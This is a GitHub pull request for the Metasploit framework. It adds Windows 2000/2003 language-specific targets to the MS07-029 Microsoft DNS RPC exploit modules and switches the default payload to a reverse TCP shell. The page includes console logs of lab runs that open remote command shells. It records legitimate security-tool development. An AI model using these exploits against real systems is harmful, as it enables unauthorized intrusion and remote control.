Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

ms07_029_msdns_zonename: Add additional Windows 2000/2003 target offsets #15918

Merged
merged 1 commit into from
Nov 30, 2021
Merged

ms07_029_msdns_zonename: Add additional Windows 2000/2003 target offsets #15918

merged 1 commit into from
Nov 30, 2021

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Nov 29, 2021
edited
Loading

  • Adds 12 new targets to both DCERPC and SMB modules for MS07-029. Targets are identical for both modules.
    • All new targets tested with DCERPC module
    • Two new targets tested with SMB module
  • Fixes a bug in the automatic targeting for the DCERPC module, which was broken due to using target instead of mytarget.
  • Sets the default payload to windows/shell/reverse_tcp for compatibility with these systems.

DCERPC module tested on:

  • Windows 2000 Server SP4 German
  • Windows 2000 Server SP4 Polish
  • Windows 2000 Server SP4 Portuguese
  • Windows 2000 Server SP4 Korean
  • Windows 2000 Server SP4 Russian
  • Windows 2000 Server SP4 Simplified Chinese
  • Windows 2000 Server SP4 Spanish
  • Windows 2000 Server SP1 Swedish
  • Windows 2000 Server SP4 Traditional Chinese
  • Windows 2000 Server SP4 Turkish
  • Windows 2003 Server SP2 Russian
  • Windows 2003 Server SP2 Simplified Chinese

SMB module tested on:

  • Windows 2000 Server SP4 German
  • Windows 2003 Server SP2 Russian

Example output below (Russian Cyrillic characters in command prompt do not render correctly).

windows/dcerpc/ms07_029_msdns_zonename

Windows 2000 Server SP4 Russian:

msf6 exploit(windows/dcerpc/ms07_029_msdns_zonename) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.171:0 - Connecting to the endpoint mapper service...
[*] 172.16.191.171:0 - Discovered Microsoft DNS Server RPC service on port 1039
[*] 172.16.191.171:0 - Connecting to the endpoint mapper service...
[*] 172.16.191.171:0 - Connecting to the endpoint mapper service...
[*] 172.16.191.171:0 - Detected a Windows 2000 SP0-SP4 target...
[*] 172.16.191.171:0 - Trying target Windows 2000 Server SP0-SP4+ Russian...
[*] 172.16.191.171:0 - Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_ip_tcp:172.16.191.171[0] ...
[*] 172.16.191.171:0 - Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_ip_tcp:172.16.191.171[0] ...
[*] 172.16.191.171:0 - Sending exploit...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.171
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.171:1041 ) at 2021-11-28 21:38:46 -0500
[-] 172.16.191.171:0 - Error: no response from dcerpc service


Shell Banner:
Microsoft Windows 2000 [_ 5.00.2195]
(_) _ _, 1985-2000.

C:\WINNT\system32>
-----

windows/smb/ms07_029_msdns_zonename

Windows 2003 Server SP2 Russian:

msf6 exploit(windows/smb/ms07_029_msdns_zonename) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.247:445 - Detected a Windows 2003 SP2 target...
[*] 172.16.191.247:445 - Trying target Windows 2003 Server SP1-SP2 Russian...
[*] 172.16.191.247:445 - Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_np:172.16.191.247[\dnsserver] ...
[*] 172.16.191.247:445 - Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_np:172.16.191.247[\dnsserver] ...
[*] 172.16.191.247:445 - Sending exploit...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.247
[-] 172.16.191.247:445 - Error: Stream #<Socket:0x000055649534d4e8> is closed.
[*] Command shell session 33 opened (172.16.191.192:4444 -> 172.16.191.247:1124 ) at 2021-11-30 02:29:19 -0500


Shell Banner:
Microsoft Windows [?????? 5.2.3790]
-----
          

C:\WINDOWS\system32>

@bcoles bcoles mentioned this pull request Nov 29, 2021
Closed
@timwr
Copy link
Contributor

timwr commented Nov 29, 2021

@ICONQUESTION perhaps you can confirm whether this fixes #15910 ?
If so this looks good.

timwr
timwr approved these changes Nov 30, 2021
View reviewed changes
Copy link
Contributor

@timwr timwr left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think this looks good and I trust the testing from bcoles.
I'll go ahead and land this.

@timwr timwr merged commit abb11cf into rapid7:master Nov 30, 2021
@bcoles bcoles deleted the ms07_029_msdns_zonename branch November 30, 2021 08:26
@smcintyre-r7 smcintyre-r7 added rn-modules release notes for new or majorly enhanced modules rn-enhancement release notes enhancement and removed rn-modules release notes for new or majorly enhanced modules labels Dec 3, 2021
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds 13 new language pack-specific targets to the ms07_029_msdns_zonename exploit.

@bcoles
Copy link
Contributor Author

bcoles commented Dec 3, 2021

Release Notes

This adds 13 new language pack-specific targets to the ms07_029_msdns_zonename exploit.

12 targets. Also, both ms07_029_msdns_zonename exploit x2 (smb and dcerpc).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@timwr timwr timwr approved these changes

Assignees
No one assigned
Labels
enhancement module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@bcoles @timwr @smcintyre-r7